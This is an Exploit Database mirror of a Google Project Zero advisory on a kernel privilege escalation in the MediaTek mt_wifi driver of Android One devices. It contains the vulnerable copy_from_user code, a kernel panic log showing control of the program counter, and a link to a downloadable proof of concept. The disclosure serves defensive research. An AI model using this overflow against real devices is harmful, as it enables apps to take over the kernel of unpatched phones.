Android One – mt_wifi IOCTL_GET_STRUCT Privilege Escalation

• Exploit Database
• 112 阅读

• 作者： Google Security Research
  日期： 2016-03-28
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/39629/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163

  Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678   The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL.   This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.   See ​ hello-jni.tar.gz​ for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.   [ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: GW3.10.57-g9e1c396 #1 [ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000 [ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040 [ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484 [ 56.847092]-(0)[880:tx_thread]pc : [<40404040>]lr : [<c0408be4>]psr: a0000013 [ 56.847092]sp : cb99fdb0ip : c001813cfp : cb99fe0c [ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0r9 : 0000af00r8 : 00000110 [ 56.849552]-(0)[880:tx_thread]r7 : 0000002cr6 : cc0a63c0r5 : 00000001r4 : c0cade08 [ 56.850560]-(0)[880:tx_thread]r3 : 40404040r2 : 00000040r1 : dd5d0110r0 : 00000001 [ 56.851570]-(0)[880:tx_thread]Flags: NzCvIRQs onFIQs onMode SVC_32ISA ARMSegment kernel [ 56.852675]-(0)[880:tx_thread]Control: 10c5387dTable: 9e9b006aDAC: 00000015 [ 56.853585]-(0)[880:tx_thread] [ 56.853585]LR: 0xc0408b64: [ 56.854297]8b64e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000 [ 56.855306]8b8401a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000 [ 56.856314]8ba4e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010 [ 56.857323]8bc4e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33 [ 56.858332]8be4e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000 [ 56.859340]8c04e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000 [ 56.860349]8c24e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010 [ 56.861358]8c44e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014 [ 56.862369]-(0)[880:tx_thread] [ 56.862369]SP: 0xcb99fd30: [ 56.863083]fd3000000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110 [ 56.864091]fd500000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110 [ 56.865100]fd7000000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00 [ 56.866108]fd90c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff [ 56.867117]fdb000000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000 [ 56.868126]fdd0cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000 [ 56.869135]fdf0e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28 [ 56.870143]fe100000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14 [ 56.871155]-(0)[880:tx_thread] [ 56.871155]IP: 0xc00180bc: [ 56.871868]80bcee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 [ 56.872877]80dce203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001 [ 56.873885]80fc3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312 [ 56.874894]811ce2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e [ 56.875902]813ce0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e [ 56.876911]815c00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a [ 56.877920]817ce1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa [ 56.878929]819ce1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01 [ 56.879940]-(0)[880:tx_thread] [ 56.879940]FP: 0xcb99fd8c: [ 56.880653]fd8c0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 [ 56.881662]fdacffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 [ 56.882671]fdcc00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 [ 56.883679]fdece54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 [ 56.884688]fe0cc0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 [ 56.885697]fe2ce54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000 [ 56.886705]fe4cc0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4 [ 56.887714]fe6cc03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540 [ 56.888726]-(0)[880:tx_thread] [ 56.888726]R1: 0xdd5d0090: [ 56.889439]009000000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193 [ 56.890447]00b0c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000 [ 56.891456]00d0ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8 [ 56.892465]00f0e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d [ 56.893473]011000000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775 [ 56.894482]013010b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc [ 56.895491]015025b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad [ 56.896499]0170a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111 [ 56.897511]-(0)[880:tx_thread] [ 56.897511]R4: 0xc0cadd88: [ 56.898224]dd88c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.899233]dda841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.900241]ddc841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.901250]dde841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.902259]de0841414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3 [ 56.903267]de28000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000 [ 56.904276]de4800000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.905285]de6800000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000 [ 56.906297]-(0)[880:tx_thread] [ 56.906297]R6: 0xcc0a6340: [ 56.907009]634000000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358 [ 56.908018]6360df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000 [ 56.909027]638000000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000 [ 56.910035]63a000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.911044]63c0dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000 [ 56.912053]63e000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.913062]640000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.914070]642000000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000 [ 56.915082]-(0)[880:tx_thread] [ 56.915082]R10: 0xc0cac270: [ 56.915806]c2707f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000 [ 56.916814]c29000000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000 [ 56.917823]c2b000000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000 [ 56.918832]c2d000000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000 [ 56.919840]c2f000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.920849]c31000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.921858]c33000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.922866]c35000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248) [ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000) [ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0 [ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 [ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000 [ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28 [ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 [ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0 [ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000 [ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000 [ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0 [ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8 [ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50 [ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc [ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48 [ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000 [ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead [ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000 [ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000 [ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff [ 56.948658]Backtrace: [ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638) [ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000 r4:e54b6168 [ 56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] (wlanSendCommand+0x194/0x220) [ 56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474) [ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001 [ 56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640) [ 56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0) [ 56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c) [ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc [ 56.958970]-(0)[880:tx_thread]Code: bad PC value [ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]--- [ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception   The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632   case PRIV_CMD_SW_CTRL: pu4IntBuf = (PUINT_32)prIwReqData->data.pointer; prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0];   //kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8); if (copy_from_user(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, prIwReqData->data.length)) { status = -EFAULT; break; } prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL; prNdisReq->inNdisOidlength = 8; prNdisReq->outNdisOidLength = 8;   /* Execute this OID */ status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen); break;   prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption.     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip